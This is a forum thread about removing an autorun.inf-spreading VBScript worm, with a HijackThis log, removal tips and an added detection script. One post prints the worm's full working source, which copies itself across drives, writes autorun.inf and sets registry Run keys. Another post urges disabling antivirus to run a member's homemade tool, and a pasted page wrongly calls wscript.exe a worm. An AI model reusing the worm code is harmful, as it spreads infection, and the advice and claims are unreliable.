slaughters

Wscript..

wscript.. I don't know what to do any more.. I'm using Avast AV.. it can't kill or detect this thing automatically.. this is because of ravmon.. you click on a partition.. then you can't get in.. only right-click works.. to delete the autorun.inf file.. you have to kill the wscript process....

What should I do?

wscript.. I don't know what to do any more.. I'm using Avast AV.. it can't kill or detect this thing automatically.. this is because of ravmon.. you click on a partition.. then you can't get in.. only right-click works.. to delete the autorun.inf file.. you have to kill the wscript process....

What should I do?

Have you tried booting Windows in safe mode?


Have you tried booting Windows in safe mode?

Why boot into safe mode? Actually the process can be "killed".. but that's the thing.. ermm.. I want to know how to find its "mother".. really annoying.. ehehe..


I want to know how to find its "mother".. really annoying.. ehehe..

Usually with this kind of virus you have to remove it from startup first. Then delete the virus manually.

Try looking in windows>system32.

Or else inside windows.

Be a bit careful not to delete the wrong thing, just don't delete system files.

:lol:


Why boot into safe mode? Actually the process can be "killed".. but that's the thing.. ermm.. I want to know how to find its "mother".. really annoying.. ehehe..

Do you just want to kill it, or do you want to delete it outright??

If you only kill it,

the next time you reboot the computer, the process will come back again..

Or did I misunderstand??? :huh:


Why not try the antivirus software I made... who knows, it might detect something... make sure you turn off your existing antivirus first, and only then run this program...

Download at: Server 1


Do you just want to kill it, or do you want to delete it outright??

If you only kill it,

the next time you reboot the computer, the process will come back again..

Or did I misunderstand??? :huh:

ermm.. I said I can kill the process.. huhu.. so how, can the process be deleted? :(

Why not try the antivirus software I made... who knows, it might detect something... make sure you turn off your existing antivirus first, and only then run this program...

Download at: Server 1

You made this antivirus yourself? Wow.. ok.. I'll try it first.. anyway, thanks..


wscript.exe is 'registered' as Microsoft ® Windows Script Host

Expected location:

C:\WINDOWS\system32\wscript.exe

If you want to activate wscript.exe and adjust it a bit:

from Run -> type wscript.exe -> Enable 'stop script after specified number of seconds'

If you just want to Enable/Disable wscript.exe:

download -> click to enable/disable

http://www.symantec.com/avcenter/noscript.exe

* if you want to delete it, that may be possible in safe mode, but I don't know what the effect would be

maybe IE ActiveX, JavaScript, VBScript and other Windows components won't function

* Wscript.exe and Cscript.exe are probably part of the IE components

* you need to find its 'mother' first, wscript.exe is not at fault; run Spybot & paste a HijackThis log


Logfile of HijackThis v1.99.1

Scan saved at 8:41:05 AM, on 12/11/2006

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\Explorer.EXE

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe

C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe

C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe

C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe

C:\Program Files\Mozilla Firefox\firefox.exe

C:\WINDOWS\system32\wuauclt.exe

C:\Documents and Settings\Administrator\Desktop\hijackthis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll

O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll

O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized

O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP

O8 - Extra context menu item: &Clean Traces - C:\Program Files\DAP\Privacy Package\dapcleanerie.htm

O8 - Extra context menu item: &Download with &DAP - C:\Program Files\DAP\dapextie.htm

O8 - Extra context menu item: Download &all with DAP - C:\Program Files\DAP\dapextie2.htm

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O11 - Options group: [iNTERNATIONAL] International*

O17 - HKLM\System\CCS\Services\Tcpip\..\{2F158875-931F-4DF7-BAF1-732836AEB8C9}: NameServer = 10.20.16.2,10.20.16.3

O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll

O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe

O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe

O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe

O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe

ermm.. here's the HijackThis log.. :huh:


R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

My PC once got hit by this VBS..

Here's its code.. I still keep it in the avast! virus chest...

'My name is Slow but sure V0.04
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Try searching for the file MS32DLL.dll.vbs; make sure you tick the advanced options: search subfolders, system folders and hidden files/folders... usually this script sits on every local partition (C:\MS32DLL.dll.vbs, d:\MS32DLL.dll.vbs) and in c:\windows\MS32DLL.dll.vbs, I think..

Correct me if I'm wrong..

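An added example, not part of the original post and not any forum member's code: a Python triage of one drive root for the autorun.inf plus script-host pattern that the script quoted above writes. The function names and the temporary-directory sample are assumptions constructed for illustration.

```python
import ntpath
import re
import tempfile
from pathlib import Path

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
# [autorun] keys that make Explorer launch a command on AutoPlay or double-click.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)

def _names(command):
    """Lower-cased file names of each whitespace-separated token in a command."""
    return [ntpath.basename(tok.strip('"')).lower() for tok in command.split()]

def suspicious_autorun_entries(text):
    """Return (key, command) pairs in [autorun] that start a script host or script."""
    hits, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, command = (part.strip() for part in line.split("=", 1))
        if LAUNCH_KEY.match(key) and any(
            n in SCRIPT_HOSTS or ntpath.splitext(n)[1] in SCRIPT_EXTS
            for n in _names(command)
        ):
            hits.append((key.lower(), command))
    return hits

def triage_root(root):
    """Check one drive root (or mounted image) for autorun.inf and the script it names."""
    files = {p.name.lower(): p for p in Path(root).iterdir() if p.is_file()}
    inf = files.get("autorun.inf")
    hits = suspicious_autorun_entries(inf.read_text(errors="replace")) if inf else []
    present = sorted({files[n].name for _, cmd in hits for n in _names(cmd)
                      if n in files and ntpath.splitext(n)[1] in SCRIPT_EXTS})
    return {"autorun": hits, "scripts_present": present}

def demo():
    # Constructed sample: the autorun.inf text built in `atr` above, plus a harmless placeholder.
    with tempfile.TemporaryDirectory() as d:
        Path(d, "autorun.inf").write_text("[autorun]\r\nshellexecute=wscript.exe MS32DLL.dll.vbs")
        Path(d, "MS32DLL.dll.vbs").write_text("' placeholder\n")
        return triage_root(d)
```

Run `triage_root` against each local and removable drive root; `iterdir()` lists files even when they carry the read-only, hidden and system attributes the script sets (`attributes = 39`), which is why Explorer's default view does not show them.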

You're really good.. ok.. I'll try it in a sec.. thanks!

The portable antivirus you made is good.. it can detect it.. but I still can't get rid of hacked by godzilla!! What do I do! I think we need a thread to discuss this thing.. my whole network has been hit.. really annoying...


Have you tried using search? (*.vbs)

Then see where it put them..

The usual 'mother' folders (from experience):

1. a hidden folder inside c:\windows

2. c:\documents and settings\username\application data

3. c:\documents and settings\username\local settings\application data

4. c:\documents and settings\username\templates

P.S.: but don't just go deleting things, or you may end up unable to boot :lol:

But vbs files usually aren't critical to the system, so you could say it's safe, but be careful..


but I still can't get rid of hacked by godzilla!!

Change it yourself in the registry:

HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla


Change it yourself in the registry:

HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

hoho.. hacked by Godzilla is settled.. ehehe.. thanks.. :lol:


I got hit too.. what now? I can't double-click the partitions.. I don't understand the method you guys described..

How do I make the PC's partitions double-clickable again? My computer got hit too..


Download the latest Portable Antivirus to detect this type of virus... This virus will be detected as VBS/Slowbut.

I've made detection for 2 variants as well as the junk left behind by this virus... If the virus is running, PAV will automatically terminate the running process... Try it first...

Don't worry, the registry & the 'H@cked by ...' text will also be fixed automatically...


wscript.exe

wscript.exe - Here is the scoop on Vbswg.Aq Worm as it pertains to computer network security. The big question: what is wscript.exe and is it spyware, a trojan and if so, how do I get rid of Vbswg.Aq Worm?

wscript.exe (Vbswg.Aq Worm) - Details

If a process named wscript.exe is running on your computer, you may have been infected with a strain of the Vbswg.Aq worm.

wscript.exe is considered to be a security risk, not only because antivirus programs flag Vbswg.Aq Worm as a virus, but also because a number of users have complained about its performance.

Vbswg.Aq Worm is likely a virus and as such, presents a serious vulnerability which should be fixed immediately! Delaying the removal of wscript.exe may cause serious harm to your system and will likely cause a number of problems, such as slow performance, loss of data or leaking private information to websites.

You should visit our free spyware removal page to make sure your system does not have other programs like wscript.exe.

WSCRIPT.EXE - Disclaimer

Every attempt has been made to provide you with the correct information for wscript.exe or VBSWG.AQ WORM. Many spyware/malware programs use filenames of usual, non-malware programs. If we have included information about wscript.exe that is inaccurate, we would greatly appreciate your help by updating the spy bot database and we'll promptly correct it.

You should verify the accuracy of information we provided about wscript.exe. Vbswg.Aq Worm may have had a status change since this page was published.


wscript.exe

wscript.exe - Here is the scoop on Vbswg.Aq Worm as it pertains to computer network security. The big question: what is wscript.exe and is it spyware, a trojan and if so, how do I get rid of Vbswg.Aq Worm?

wscript.exe (Vbswg.Aq Worm) - Details

If a process named wscript.exe is running on your computer, you may have been infected with a strain of the Vbswg.Aq worm.

. . .

In short, wscript.exe is for running Visual Basic Script files... this file is not a virus, Microsoft does provide it in every Windows, but it can pose a security risk (Low)...

Vbswg stands for Visual Basic Script Worm Generator.
